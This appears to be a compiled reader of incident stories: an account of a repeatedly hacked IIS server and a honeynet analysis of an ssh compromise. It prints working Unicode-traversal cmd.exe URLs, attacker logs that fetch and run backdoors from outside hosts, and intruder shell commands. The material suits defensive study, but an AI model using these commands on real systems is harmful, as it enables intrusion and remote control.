English Material: Chronicles of Network Attack and Defense
Part 1: English Material: Chronicles of Network Attack and Defense
Close Encounters of the Hacker Kind: A Story from the Front Line
Date: Dec 20, By Seth Fogie. Article is provided courtesy of Prentice Hall PTR.
Hackers, viruses, and Trojans can cause plenty of headaches, as author Seth Fogie knows from personal experience. Read about one experience he had with a server that was repeatedly hacked. From IIS vulnerabilities to a hacker's IRC server, this article covers it all.
It all started with a fairly innocent call from a client/friend of the family who was having Internet problems. Specifically, he was wondering why his T1 line was moving uncharacteristically slow and was concerned that he may have contracted a virus. This particular client had a past history of becoming victim to viruses and worms, so his concern was valid. I said I would take a look.
Knowing about this client's previous infestations, I expected that he had probably fallen victim to yet another worm or virus and just needed some simple suggestions and pointers on how to remove it. To my surprise, this assumption only scratched the surface of the many problems this client was having. As you will learn, my client's network had not only become infected by digital worms, but it had also become home to a horde of hackers using it as a warez server and to a brand new IRC Trojan/IIS worm named Total Kill.
The Client
This particular client is one of those small businesses that doesn't need to hire a full-time computer person. Instead, it relies on the good will and part-time support of friends and family members. As a result, its network has been through the hands of several competent but distinctly unique support personnel during the last couple of years, each of whom has added to the overall layout and configuration of the network. What makes matters more interesting is that the client was previously a mini Internet service provider (ISP) for some local-area businesses.
Due to its ISP business, the client purchased a T1 and, with it, several hundred IP addresses and the equipment to manage them. So as to not put these addresses to waste, one of the previous administrators had set up a Cisco router and DHCP server to provide each internal computer with a unique public IP address. In other words, every device on the network has a dedicated IP address that was accessible from the Internet.
At the core of this network is one computer hosting a multitude of services. The computer, running Microsoft's NT4 operating system, operated as a DNS server, DHCP server, Exchange server, primary domain controller, and file server; it also acted as a host to a custom database program for the business. Because this computer was providing so many services, it was a primary target for viruses and worms. In fact, five months before this situation, the server had been cleaned of a Nimda infestation.
The Preliminary Investigation: Day 1, Afternoon
The first thing I needed to do was determine the status of the network. In other words, I was looking for open ports that could indicate the presence of a rogue service or Trojan. The best tool to do this quickly and comprehensively is nmap, which I set up to perform a full 1-65,535 port scan of the entire IP address range. The command I used to do this is shown here:
nmap -sS -p 1-65535 -O 192.168.0.x-x    (where x represents the range within the subnet)
Once nmap was finished probing, I quickly scanned the output, looking for anything fishy or painfully obvious, such as port 31337, 12345, 21, 23, or anything else that represented a rogue service or popular Trojan port. While most of the computers did return positive results on ports 135-139, indicating NetBIOS and possible shares, it was the open port 80 on the client's main server that got my attention (see Listing 1).
Listing 1-1: nmap Result of the Client's Main Server
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.66):
(The ports scanned but not shown below are in state: closed)
Port State Service
53/tcp open domain
80/tcp open http
135/tcp open loc-srv
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
593/tcp open http-rpc-epmap
1029/tcp open unknown
1031/tcp open iad2
1035/tcp open unknown
1038/tcp open unknown
1042/tcp open unknown
1490/tcp open unknown
Upon finding port 80 open, I immediately opened my browser and plugged in the server's IP address to see if this server was indeed providing Web pages, in addition to the many other things it was responsible for (port 80 is the port typically used by Web servers). To my dismay, I found the default Internet Information Server (IIS) installation Web page. The next obvious step was to probe the Web server software for known vulnerabilities. So, I fired up a few of my favorite Web CGI scanners (whisker, Stealth, CGI4) and went to lunch.
When I got back, to my chagrin, I found that the IIS responded positively to most of the Unicode exploits tested by the scanners. In other words, a weakness in the Web server could be used by hackers and worms alike to infect and take over the server. Since the Unicode exploit is a rather old one, and because of the simple fact that this server was vulnerable, I was rather sure that it had not been patched in some time and was also missing the latest service packs (such as SP 6).
Unicode Explained
Unicode is one of several methods for encoding text on a computer. What makes Unicode distinct is that it assigns a unique code point to every character, regardless of language, platform, or program. As a result, Unicode is supported by most major vendors, including Microsoft, which is responsible for the infamous IIS.
When a Web server is queried for a resource, it is supposed to return only files that live under its configured folders. It is not supposed to provide access to any other files on the server through directory traversal. For example, if you open Windows Explorer and make your way to the c:\windows\system32 folder, you will be presented with a file listing of that directory. If instead you go to c:\windows\system32\..\..\, you will find yourself staring at the c:\ root folder: each "\..\" tells the operating system to move up one level in the folder structure, or traverse the directory. The same notation can be sent to a Web server in a URL, so the server must control it to prevent Web users from reaching files and folders outside the Web server's root folder, which for IIS is typically c:\inetpub\wwwroot.
To control sneaky Web users, IIS programmers included code that reviewed the requested path and rejected directory traversal via "/../". However, this check ran before the request had been fully decoded. A "/" or "\" could be written as an overlong UTF-8 sequence (for example %c0%af for "/"), which the traversal check did not recognise as a path separator; IIS then decoded it into a real separator after the check had already passed (Microsoft Security Bulletin MS00-078). This oversight let a hacker read any file on the server that the Web server's account could read. In addition, because the request could name c:\winnt\system32\cmd.exe and pass it arguments, the same flaw gave its user the power to execute programs with the Web server's privileges. This compounded the problem and made it one of the most serious threats to security that Microsoft ever faced. The URLs later in this article use the encoded backslash (%5c) instead; the traversal idea is the same, only the encoding of the separator differs.
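As an added example (not code from the article, and a simplification rather than a reproduction of IIS internals), the following Python models the ordering flaw just described beside the corrected order of operations. The web root, the function names and the sample URLs are assumptions; the model covers the overlong-UTF-8 form of the separator and uses ntpath so it runs on any platform.

```python
"""Added example, not code from the article: a model of the IIS "Unicode"
directory-traversal flaw and of the corrected order of operations.

Assumptions: the web root below is hypothetical, the function names are
mine, and the model covers the overlong-UTF-8 form (%c0%af, %c1%9c); it is
a simplification of IIS, not a reproduction of its code.
"""
import ntpath
from urllib.parse import unquote_to_bytes

WEB_ROOT = r"c:\inetpub"   # hypothetical: /scripts maps to c:\inetpub\scripts


def lenient_utf8(data: bytes) -> str:
    """Decode UTF-8 the way a permissive decoder did: an overlong two-byte
    sequence such as C0 AF is accepted and yields '/', C1 9C yields a
    backslash.  Python's strict .decode('utf-8') rejects both."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))); i += 2
        else:
            out.append("\ufffd"); i += 1
    return "".join(out)


def to_filesystem(url_path: str) -> str:
    """Map a URL path onto the web root; '/' and '\\' both act as separators."""
    rel = url_path.replace("/", "\\").lstrip("\\")
    return ntpath.normpath(ntpath.join(WEB_ROOT, rel))


def inside_root(fs_path: str) -> bool:
    """Containment check on a canonicalised path (case-insensitive, as on NT)."""
    root = WEB_ROOT.lower().rstrip("\\")
    return fs_path.lower() == root or fs_path.lower().startswith(root + "\\")


def vulnerable_resolve(url_path: str):
    """Flawed order: the containment check runs on the percent-decoded bytes
    while C0 AF is still two opaque bytes; UTF-8 decoding happens afterwards
    and turns them into a separator the check never saw."""
    raw = unquote_to_bytes(url_path)
    if not inside_root(to_filesystem(raw.decode("latin-1"))):
        return None                             # a plain ../ is caught here
    return to_filesystem(lenient_utf8(raw))     # but overlong forms get through


def fixed_resolve(url_path: str):
    """Fixed order: decode strictly (overlong sequences are an error),
    canonicalise, then check that the result is still under the root."""
    raw = unquote_to_bytes(url_path)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    fs_path = to_filesystem(text)
    return fs_path if inside_root(fs_path) else None


if __name__ == "__main__":
    probe = "/scripts/..%c0%af../winnt/system32/cmd.exe"
    print("vulnerable:", vulnerable_resolve(probe))   # c:\winnt\system32\cmd.exe
    print("fixed:     ", fixed_resolve(probe))        # None
```

The point to take from the model is not the decoder but the order: any check performed on a representation that is later transformed again can be bypassed by whatever the later transformation produces, so canonicalise completely first and check last.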
Penetration Testing: Day 1, Night
At this point, I had a good notion of where to start probing. Using the following URL, I commanded the server to show me a directory listing of the c:\winnt\system32 directory:
192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\winnt\system32\
Once the browser returned the results, I scanned the files and folders and quickly spotted several suspicious files that piqued my interest. Figure 1 is a screen shot of these files; see if you can spot the problem.
Figure 1 Partial directory listing of c:\winnt\system32\.
Did anything seem like it didn't belong? If you recognized these files for what they are, congratulations! Unfortunately, many network administrators wouldn't give these files a second glance.
The following is a listing of the files that concerned me and why:
PipeCmd.exe: Client side of a remote-control tool used by hackers.
omnithread_tr.dll: One of the three files needed to set up VNC, a popular and legitimate remote-control utility.
VNCHooks.dll: The second of three files needed to set up VNC.
Vnsystask.exe: The third of three files needed to set up an illegitimate back-door VNC program that hides from the user.
nc.exe: Netcat, a very common remote shell program.
pw.exe: Also known as pwdump(2).exe. A program that extracts NT users and passwords.
Samdump.dll: File required by pwdump.exe to extract user account information.
GetAdmin.exe: Common program that gives a user administrator rights.
In other words, this server had not one, but two root kits installed in the c:\winnt\system32 directory. As I was about to learn, this was just one of more than 10 root kits that were all competing for the server's attention. In fact, the SysStat directory that is also shown in Figure 1 and that was installed October 7, 2002, includes yet another root kit.
Next, I used another URL to pull up the c:\ directory listing, just to see if there were any interesting files located in the root directory of the server. The following is the URL used. Listing 2 shows the output it provided.
192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
Listing 1-2: Directory Listing of the Server's C Drive
Volume in drive C has no label.
Volume Serial Number is DCF0-0832
Directory of C:
10/10/02 01:03p 1,000,000 1mb
05/20/02 09:32a 0 AUTOEXEC.BAT
10/18/02 12:57a 789 bootobc.dll
10/10/02 12:42p 223 CDIR.TXT
05/20/02 09:32a 0 CONFIG.SYS
10/30/02 05:53p 0 dir.txt
11/23/99 10:04a 208,144 dns.exe
06/07/02 11:04a 524,288 errorlog.evt
05/28/02 07:06p
10/04/02 06:38p 0 explorer.exe
10/04/02 06:38p 0 explorer.ini
05/20/02 10:18p
09/24/02 06:49p
09/29/02 01:03p 6,721,536 httpodbc.dll
09/27/02 09:36p
10/18/02 01:11a
10/10/02 12:45p 6,656 INFUSE.EXE
10/10/02 12:43p 602 LOGIN.TXT
10/02/02 02:17p 59,392 ncx99.exe
10/30/02 02:47p 6,693 netstat.txt
10/30/02 10:09a 536,870,912 pagefile.sys
07/24/02 01:29p
10/10/02 12:44p 81 pt.txt
10/14/02 05:21a 1,307 ra_slave.log
10/26/02 01:21p 716 Script.bat
10/26/02 01:21p 95 Script.txt
10/29/02 07:42p 1,949 servudaemon.ini
10/28/02 04:40p 528 ServUStartUpLog.txt
10/04/02 04:25p 15,000,000 SR.CD2-H2O.r41
09/28/02 01:33p
10/10/02 12:43p 17,920 TLIST.EXE
06/18/02 10:00p
09/28/02 01:18p
10/10/02 12:45p 496,836 WINMGNT.EXE
10/30/02 01:09p
35 File(s) 560,918,667 bytes
At this point, I laughed as I started to realize the scope of the infestation. In the root directory of the server were two files, scripts.bat and scripts.txt, that all but screamed "installed by a hacker." Out of curiosity, I decided to pull up the contents of these two files to see what they contained. The following are the URLs I used to do this. Listings 3 and 4 show the contents returned to the browser.
192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+type+c:\scripts.bat
192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+type+c:\scripts.txt
Listing 1-3: Contents of the scripts.bat File
Mkdir c:\recycler
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
old_files
Mkdir d:\recycler
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
old_files
mkdir e:\recycler
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784
c:\winnt\system32\ftp -n -s:script.txt
c:\winnt\system32\svhost.exe /i
c:\winnt\system32\psshutdown.exe -r -l -f
Listing 1-4: Contents of the scripts.txt File
open 210.171.xxx.xxx:11515
USER ironfredh
hichic
get svhost.exe
get servudaemon.ini
quit
In other words, this server was H4x0r3d. I was feeling a bit left out of the fun, so I figured I would follow the path so clearly laid before me. So, I typed in one last URL that would execute the ncx99.exe file sitting in the c:\ directory, and then I telnetted to port 99 on the server:
192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+c:\ncx99.exe
NOTE
ncx99.exe is a popular hacked version of netcat with the listener options (listen on port 99, hand the connection to cmd.exe) compiled in, so it opens an unauthenticated command shell on TCP port 99. This allows anyone using any operating system that supports Telnet to connect to and control the host system with whatever privileges the process that started it had.
Upon connection, I changed the directory to c:\ to verify that I was on the undeniably hacked server. I then performed a full directory listing and outputted the results to a file in the c:\ directory using the dir /s >>dir.txt command, which I then downloaded to my computer for a closer analysis.
Owned by Joe, Mary, Pete, and I Think My Mother
Once I had the results of my directory listing in front of me, I had to laugh again. In fact, I was so astonished that I called my client back and told him, “You know that Exchange server? I think you are the only person on this planet who doesn't own it!” From just a quick scan, I concluded that the server had been owned no less than 10 times. Listing 5 shows just some of the folders that contained root kit files.
Listing 1-5: Folder Listing Containing Root Kits
C:\scripts.bat
C:\temp\win.asp
c:\inetpub
c:\inetpub\scripts
c:\inetpub\wwwroot
c:\inetpub\mailroot\drop\temp
c:\winnt\system32
c:\winnt\system32\sysstat
However, what really got my attention was the folder listing in Listing 6.
Listing 1-6: Directory of c:\RECYCLER\system\winnt\test\system2
10/26/02 04:48a
10/26/02 04:48a
10/24/02 03:49p
10/24/02 03:50p
FiLL3d by THC
10/24/02 04:00p
10/24/02 04:24p
10/26/02 04:49a
7 File(s) 0 bytes
Upon further investigation, I discovered that these folders held about 3GB of illegal warez, mostly consisting of more than 500 Game Boy Advance ROMs. Based on the dates of the folder and file creations, I thought I had found one of the main reasons the Internet connection was slowing down. Further investigation of the server revealed that it was also infected with the Nimda worm, which was actively sending out thousands of probes to the Internet as it looked for other targets.
At this time, I once again called the owner and administrator and told them that they should unplug the server and format it completely and thoroughly. I told them that they were hosting illegal files and that it could be a liability for them if they didn't remove them immediately. We discussed options for using firewalls, redesigning their network using a router and NAT-based protection, and ensuring that the new installation did not include the Web server and did include all required patches and service packs. This done, I hung up and started collecting information from the server while it was still up. In particular, I went looking for log files and all the scripts and root kits that were installed by the legion of hackers who owned the computer. It was during this research that the lights went out on the server.
Hacker Scripts
Before we get into the second part of this story, it is important that you understand the methods and tricks that the hackers used when they attempted to take over this server. While I say that this server was owned by more than 10 hackers, they all used the same basic vulnerability and method of attack to gain access to the server. In fact, some of the hackers used the same basic scripts to deal with the details of installing the root kit, saving them from having to manually type the commands.
By far, this server was mostly owned by script kiddies, not true hackers. While the terms are often blurred, these so-called "hackers" were not out to control the data or programs on the server. In fact, I would be willing to bet that not one of them directly targeted this server; they all discovered it as the result of a vulnerability scanner. Then, depending on the scanner or script used to detect the vulnerability, they either came back and took advantage of the Unicode exploit to install their root kit, or they had the root kit installed by the script for them. These root kits often come prepackaged and ready to go, so a "hack" can take as little as three commands and can occur in less than 5 seconds. The first step is to test the server for the vulnerability, the second is to download the root kit to the server, and the third is to install the back door on the server. To illustrate, the URLs in Listing 7 (as found in the Web server's log files) show this three-part hack.
Listing 1-7: The Minimal URLs Required to Own a Server with the Unicode Vulnerability
xx.xx.xx.xxx/scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+dir+c:\
xx.xx.xx.xxx/scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+tftp+-i+XX.XX.XX.XX+backdoor.exe+c:\backdoor.exe
xx.xx.xx.xxx/scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+c:\backdoor.exe
While this is one example, most scripts involve a sequence of more complicated steps before the server is owned. The following illustrates another hack attack and explains what each step does and why it is used. We will discuss these parts in the order in which they are most likely performed.
The first part of any hack attack is to gain access to the server. This is required so that the root kit can be downloaded. Fortunately for a hacker, there are thousands of potentially exploitable vulnerabilities. In the case of my client's server, hackers used the Unicode vulnerability to gain control of the Web server software. The following log entry shows one such script probing for the Unicode vulnerability on my client's server. (Note: This is one log entry, but it was broken into three lines due to display requirements.) I am assuming that this is a script because the log file shows mere seconds between commands. In other words, this is either a very quick-typing hacker or a script that automates the hacking process.
217.153.XXX.XX, -, 10/30/02, 18:24:06, W3SVC,
EXCHANGE, 64.3.XXX.XX, 32, 149, 2079, 200, 0,
GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+dir+c:\+,
As we look at this log entry, we can see where the request came from, where it was targeted, and the URL that was sent (the fields are, in order: client IP, user, date, time, service, server name, server IP, time taken, bytes received, bytes sent, HTTP status, Win32 status, method, URI stem, and URI query). Here we see a variation on the Unicode vulnerability that simply lists the c:\ directory on the victim. The results are sent back to the client computer (the hacker), which is basically testing to see if the server is vulnerable.
The next step of the process is to download a root kit and other files needed to gain control of the server. Again, our log file provides us with a good example. In this case, the script creates a file used to FTP the files down to the server. Because of the numerous files downloaded to the server, there was about one page of log entries; therefore, we have taken the liberty of summarizing them.
First, the script creates a new folder hidden within the c:\Inetpub directory into which the root kit is eventually placed:
217.153.xxx.xxx, -, 10/30/02, 18:25:32, W3SVC, EXCHANGE,
64.3.xxx.xxx, 16, 177, 304, 200, 0, GET, /scripts/
..%5c..%5cwinnt/system32/cmd.exe, /c+mkdir+c:\Inetpub\
mailroot\drop\temp+,
Next the script creates a copy of the cmd.exe file and places it in the newly created directory (a copy under a different name sidesteps filters and IDS signatures that look for cmd.exe in the URL; every later request in this chain calls doit.exe instead):
217.153.xxx.xxx, -, 10/30/02, 18:25:32, W3SVC, EXCHANGE,
64.3.xxx.xxx, 62, 211, 331, 200, 0, GET, /scripts/
..%5c..%5cwinnt/system32/cmd.exe, /c+copy+
c:\winnt\system32\cmd.exe+c:\Inetpub\mailroot\drop\temp\doit.exe+,
Now the script ensures that there is no pre-existing file named default.txt in the folder by deleting any file by this name that does exist (another hint that this is a script):
217.153.xxx.xxx, -, 10/30/02, 18:25:34, W3SVC, EXCHANGE,
64.3.xxx.xxx, 141, 200, 362, 200, 0, GET, /scripts/
..%5c..%5cInetpub/mailroot/drop/temp/doit.exe,
/c+del+c:\Inetpub\mailroot\drop\temp\default.txt+,
Then the script creates a new default.txt file and starts writing lines of text into it:
217.153.xxx.xxx, -, 10/30/02, 18:25:34, W3SVC, EXCHANGE,
64.3.xxx.xxx, 16, 221, 304, 200, 0, GET, /scripts/
..%5c..%5cInetpub/mailroot/drop/temp/doit.exe, /c+echo+open+
65.40.28.170+>>c:\Inetpub\mailroot\drop\temp\default.txt+,
Using the same general URL, the lines in Listing 8 were also written into the default.txt file.
Listing 1-8: Text Lines Written to the default.txt File
Open 65.40.xxx.xxx
user anonymous >>default.txt
echo lol@lol.com >>default.txt
echo cd+rapport/backup >>default.txt
get reboot.exe >>default.txt
get TzoLibr.dll >>default.txt
echo get ServUDaemon.ini >>default.txt
echo get ServUCert.key >>default.txt
get ServUCert.crt >>default.txt
get rundlls32.exe >>default.txt
echo get ncx99.exe >>default.txt
echo get kill.exe >>default.txt
echo get tasklist.exe >>default.txt
echo quit >>default.txt
Once all the lines were written to the file, it is easy to see that the script creates a complete FTP command file. The next URL that the script sends to the server includes a command to execute FTP, using this file as its command list:
217.153.xxx.xxx, -, 10/30/02, 18:34:31, W3SVC, EXCHANGE,
64.3.xxx.xxx, 525250, 212, 304, 200, 0, GET, /scripts/
..%5c..%5cInetpub/mailroot/drop/temp/doit.exe, /c+ftp+-i+-v+-n+-s:
c:\Inetpub\mailroot\drop\temp\default.txt+,
(Note the time-taken field of 525250 in this entry: the request stayed open for almost nine minutes while ftp ran, which is itself a useful indicator when hunting through IIS logs.) Next the attack script continues to check the progress of the download by using a URL containing a dir command to list the files in the folder. Once the script detects the existence of all the files it expects to be downloaded, it builds another file used to set up a back-door FTP server. In this case, the script will be using Serv-U FTP, which is the most common FTP server used by hackers.
In short, the FTP server's configuration file (ServUDaemon.ini, which the download script fetched along with the binaries; the ServUStartUpLog.txt next to it in Listing 2 is the daemon's start-up log) must contain paths to the directories that it will be providing access to. To maximize the impact of the serving capabilities, the script simply lists every drive letter from c to z. If there is a CD-ROM or mapped drive on the server, all the better for the hacker who uses the FTP server.
The final step in this process is to execute the recently downloaded files, which set up and install the FTP server, and create and install the back-door ncx99.exe file. This is done using another URL with a call command, or by directly executing the executable on the host. The server is now owned. Depending on the script, some of the installation files may be deleted and log files may be wiped. Regardless, it takes only a few minutes to download and install a fully operational root kit that provides file-sharing and remote-control capabilities to any hacker who connects.
Summary
At this point, I discovered that this server was hacked beyond repair. It needed to be completely wiped, and both my client and the administrator knew it. However, being the curious sort, I wanted to do some research on the methods and tricks used to take over this server while it was still up. It was during this research that the Web server stopped responding to commands and the back door ceased to function. For now, this is where I leave you.
In Part II of this story, we will be looking at the methods I used to regain control of the server and how these efforts led me down a path to DOOM (quite literally). DDoS IRC bots, over 2,000 owned computers, and more await you in the FiNaL S3c7i0n.
Honeynet analysis for 02 Nov
Analyzer on duty: Steven Sim Kok Leong (steven at security.org.sg)
We have ourselves a compromised honeypot on which a weak test account was exploited over ssh! This is great! An analysis of this compromise follows.
NOTE:Further details were snipped due to sensitivity concerns. If you need them, please email me.
Based on the actions taken by the intruder, I would conclude that this intruder is a script kiddie because he never bothered to cover any of his tracks by replacing system binaries with trojaned ones or cleansing log files such as the command history.
The analysis below shows that intruders often rely on the same vulnerability and exploits they used to attack the launchpad/zombie to attack other systems from the launchpad/zombie itself. More often than not, the system that compromised you is itself a compromised system. The ultimate motive (e.g. perhaps DDoS etc.) for these zombied systems, beyond joining botnets and being used as launchpads to attack other systems on the Internet, is not yet known because at this point there isn't much IRC conversation noticed despite some IRC nick changes and chat messages (which are also reflected in snort alerts). Further monitoring of these channels by subsequent days' duty analyzers may be able to shed more light.
Regardless, in view of the considerable number of systems compromised due to weak passwords, system administrators are reminded to enforce strong passwords. Please refer to the list of recommendations and actions at one of our earlier advisories for system administrators [1]. In addition to these recommendations, from the network perspective network administrators are encouraged to take one or more of the following actions.
Block the ports TCP/6667, TCP/7000 and TCP/8888 used by the IRC botnet servers if possible (i.e. if not in use by valid services).
Block the IRC botnet servers listed below.
Block the attacker IP addresses listed below (not very effective, as most are dynamic IPs and/or compromised systems, i.e. no malicious intent was intended by the administrators of these systems).
Restrict outgoing IRC traffic to a list of trusted IRC servers if possible (principle of least privilege).
Monitor outgoing TCP/6667, TCP/7000 and TCP/8888 traffic at your border gateway.
Monitor both incoming and outgoing TCP/22 traffic at your border gateway.
In consideration of the pretty persistent ssh dictionary password attacks [1] that have been ongoing for quite some time and targeting our honeynet, a test account with password test was created on 01 Nov 2004 at 1653 hrs for the purpose of having the honeypot compromised so as to observe and analyze hacker behavior and tactics.
In less than 3 hours, at 1944 hrs, a successful ssh dictionary attack on the test account took place remotely from X.X.X.X (South Korea). However, the session was immediately terminated without any commands being executed. From this, we inferred that it is likely a program script simply scouring the Internet for accessible ssh accounts with weak passwords and collating results for the intruder who launched the script to act upon.
On 02 Nov 2004, another successful ssh dictionary attack on the test account took place remotely at 2314 hrs from Y.Y.Y.Y (China). Again, like the session on 01 Nov, the session was immediately terminated once the SSH session was established.
7 mins later at 2321 hrs on the same day, an intruder (either based on 01 Nov 1944 hrs or 02 Nov 2314 hrs results) started dropping his goods through the test account backdoor from Z.Z.Z.Z (South Korea). You will notice further in this analysis report that Z.Z.Z.Z is itself a compromised system that joined the IRC botnet (refer to list of compromised systems detected in the botnet).
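The signal the report describes, a burst of failed password guesses from one source followed by an accepted login on the guessed account, is easy to pull out of sshd's own log. The following Python is an added example, not part of the honeynet report or its tooling: it parses OpenSSH "Failed password"/"Accepted password" syslog lines, groups them by source, and reports sources that crossed a guess threshold together with the accounts they then logged into. The log lines are constructed for the example and use documentation addresses rather than the masked hosts above.

```python
"""Added example (not from the honeynet report): flag ssh dictionary attacks
and the accounts they compromised from OpenSSH auth log lines.

The sample log below is constructed for this example; the addresses are
documentation ranges, not the X.X.X.X / Y.Y.Y.Y / Z.Z.Z.Z hosts in the report.
"""
import re
from collections import defaultdict

# OpenSSH password-authentication outcomes as written to syslog.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

SAMPLE_AUTH_LOG = """\
Nov  1 19:44:01 honeypot sshd[2011]: Failed password for invalid user patrick from 203.0.113.10 port 40211 ssh2
Nov  1 19:44:02 honeypot sshd[2013]: Failed password for invalid user qwerty from 203.0.113.10 port 40212 ssh2
Nov  1 19:44:02 honeypot sshd[2015]: Failed password for root from 203.0.113.10 port 40213 ssh2
Nov  1 19:44:03 honeypot sshd[2017]: Failed password for test from 203.0.113.10 port 40214 ssh2
Nov  1 19:44:03 honeypot sshd[2019]: Failed password for invalid user test2 from 203.0.113.10 port 40215 ssh2
Nov  1 19:44:04 honeypot sshd[2021]: Accepted password for test from 203.0.113.10 port 40216 ssh2
Nov  1 20:02:17 honeypot sshd[2100]: Failed password for admin from 198.51.100.7 port 51022 ssh2
Nov  1 20:30:00 honeypot sshd[2150]: Accepted publickey for steven from 192.0.2.44 port 60001 ssh2
"""


def parse_auth_log(text: str) -> list:
    """Return one dict (result, user, ip) per password-auth line; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def find_dictionary_attacks(events: list, min_failures: int = 5) -> dict:
    """Group by source IP; report sources whose failed guesses reached the
    threshold, with the accounts accepted after the guessing started."""
    by_ip = defaultdict(lambda: {"failures": 0, "users": set(), "accepted": []})
    for e in events:
        rec = by_ip[e["ip"]]
        if e["result"] == "Failed":
            rec["failures"] += 1
            rec["users"].add(e["user"])
        elif rec["failures"] > 0:          # an accept with no prior guessing is just a login
            rec["accepted"].append(e["user"])
    return {ip: {"failures": r["failures"],
                 "distinct_users": len(r["users"]),
                 "compromised": r["accepted"]}
            for ip, r in by_ip.items() if r["failures"] >= min_failures}


if __name__ == "__main__":
    for ip, hit in find_dictionary_attacks(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"{ip}: {hit['failures']} failures over {hit['distinct_users']} users; "
              f"accounts logged into afterwards: {hit['compromised'] or 'none'}")
```

The threshold is deliberately low because the scanners described in the report try a fixed user/password list rather than many passwords per user, so the distinct-user count is as telling as the raw failure count. A run that ends in an accepted login but no commands (the 01 Nov and 02 Nov sessions above) still deserves a ticket: the next visitor will arrive with the stolen credential.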
He launched the following commands. The typos are indicative of a manual attack unlike earlier ssh dictionary attacks. In fact, the intruder specifically had problems with typing e i.e. either missing an “e” or missing the “e” and typing “w” and also occasionally missing “p”s and “t”s.
Command sequence                      Explanation
w                                     Checking whether I am online..;-)
cd /tmp                               Change directory to /tmp
w                                     Got worried. Checking whether I am online, again
ls                                    Perform a listing of the /tmp directory
wget A.A.A.A/cel.tgz                  Download cel.tgz
tar zxvf cel.tgz                      Unzip cel.tgz
rm -rf cel.tgz                        Remove cel.tgz
cd ssh                                Change directory to the ssh directory retrieved from cel.tgz
ls                                    Perform a directory listing
ls                                    Perform a directory listing again, perhaps couldn't believe what he saw?
./assh X                              Launch ssh dictionary attack at the X.0.0.0/8 class A network. The portscan alerts by snort in the summary are a result of this.
w                                     Got worried again. Checking again whether I am online.
passwd                                Changing password to protect his turf
wget B.B.B.B:793/~zorg/local.tar.gz   Download local exploit archive local.tar.gz deposited on polarhome at Aug 11 22:31
wget C.C.C.C/ccccccc/local.tar.gz     Download another local exploit archive local.tar.gz, similar in size to the one downloaded from B.B.B.B except for the timestamp. This one was deposited on Oct 6 22:11 at the geocities site.
wget D.D.D.D/psybnc.jpg               Attempt download of a bnc irc backdoor archive. Unfortunately the file is not accessible over the web.
wget E.E.E.E/psybnc.jg                Attempt failed because of a typo. E.E.E.E/psybnc.jpg does exist.
ftp                                   Intruder resorted to ftp'ing from D.D.D.D to download psybnc.jpg instead. Refer to more details below.
passed                                Attempt password change of account to protect new turf, failed because of a typo.
passwd                                Another attempt, but failed because of a typo in the password
passwd                                Perhaps he was typing slower now, so the password change was successful.
tar zxvf psybnc.jpg                   Untarring the bnc irc client archive that masqueraded with a jpg extension to hide its harmful intentions.
rm -rf psybnc.jpg                     Removing the bnc irc backdoor archive
cd xsf                                Change directory to the xsf directory retrieved from psybnc.jpg
mv crond sh" "-i                      Move the malicious bnc irc backdoor program called crond to "sh -i" to prevent it from being detected in the ps process listing
export PATH="."                       Set the path so that the malicious binary can find assisting files in the same directory.
sh" "-i                               Launch the backdoor
exit                                  Not sure why he has to type exit so many times
exi                                   Typo again
texit                                 Typo again. Not a very good typist or lousy keyboard.
exit                                  Yet another try
exit                                  Yet another time, when he finally exited.
This logon session took 12 mins.
First, lets take a deeper look into cel.tar.gz that was downloaded and the ./assh tool.
Listing of cel.tar.gz:
drwx------ httpd/root 0 2004-10-11 02:09:43 ssh/
-rwx------ httpd/root 453972 2004-07-13 02:09:58 ssh/ss
-rwxr-xr-x httpd/root 842424 2004-09-06 18:20:58 ssh/sshf
-rwx------ httpd/root 85 2004-07-13 02:10:33 ssh/go.sh
-rwx------ httpd/root 21407 2004-07-22 05:58:57 ssh/pscan2
-rwx------ httpd/root 206 2004-07-22 08:52:59 ssh/auto
-rwx------ httpd/root 605 2004-09-06 23:11:00 ssh/assh
-rwx------ httpd/root 4225 2004-07-22 08:35:14 ssh/129
-rw------- httpd/root 0 2004-07-23 08:28:03 ssh/129.98.pscan.22
Listing of ./assh script (ASCII quotes restored; comments with English translations of the Romanian messages added by the editor):
#!/bin/bash
# Expects exactly one argument: the address prefix to scan
if [ $# != 1 ]; then
echo " usage: $0 "
exit;
fi
echo " Versiune de scaner privata!"         # "Private scanner version!"
echo "----------------------------------------------------"
echo " All my love for Liz! "
